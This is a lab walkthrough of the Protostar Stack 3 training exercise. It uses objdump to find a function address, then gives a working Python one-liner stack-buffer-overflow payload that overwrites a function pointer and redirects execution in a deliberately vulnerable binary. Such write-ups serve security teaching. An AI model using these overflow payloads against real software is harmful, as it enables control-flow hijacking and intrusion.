Exploit-Exercises Protostar Stack 3

Stack 3: https://exploit-exercises.com/protostar/stack3/

Exploit-Exercises Machines: https://exploit-exercises.com/download/

This stack exercise is going to build on the previous exercises and will look at changing the address of a jump command to change the flow of the program.

First let’s look at the source code.

Ok, this looks a bit different from before, there’s no variable we have to write, just a function which is never called and a function which is called but doesn’t exist.

What this is trying to emulate is overwriting the EIP to call a different function, except this time instead of EIP we have a variable to overwrite.

Firstly we’ll need to find out what the address of the win function is in memory, fortunately objdump will show this pretty clearly.

user@protostar:/opt/protostar/bin$ objdump -x stack3 | grep win
08048424 g     F .text 00000014              win
user@protostar:/opt/protostar/bin$

The -x parameter gets objdump to list the address of all functions, searching for win gives us the win function’s address at 0x08048424.

So now we know where to go, we just need to know how much we need to overwrite the fp variable. We can pretty much guess that it’s one above our 64 byte buffer but we’ll check with Python.

user@protostar:/opt/protostar/bin$ (python -c "print 'a'*65";) | ./stack3
calling function pointer, jumping to 0x00000061
Segmentation fault
user@protostar:/opt/protostar/bin$

As expected, the 65th ‘a’ overwrote the fp variable. We now need 64 ‘a’s and then the address of win in Little Endian and we should be able to change the execution of the program. Let’s try it.

user@protostar:/opt/protostar/bin$ (python -c "print 'a'*64 + '\x24\x84\x04\x08'";) | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
user@protostar:/opt/protostar/bin$

And that’s all there is to it. The next challenge looks at what to do if there isn’t a convenient fp function being called.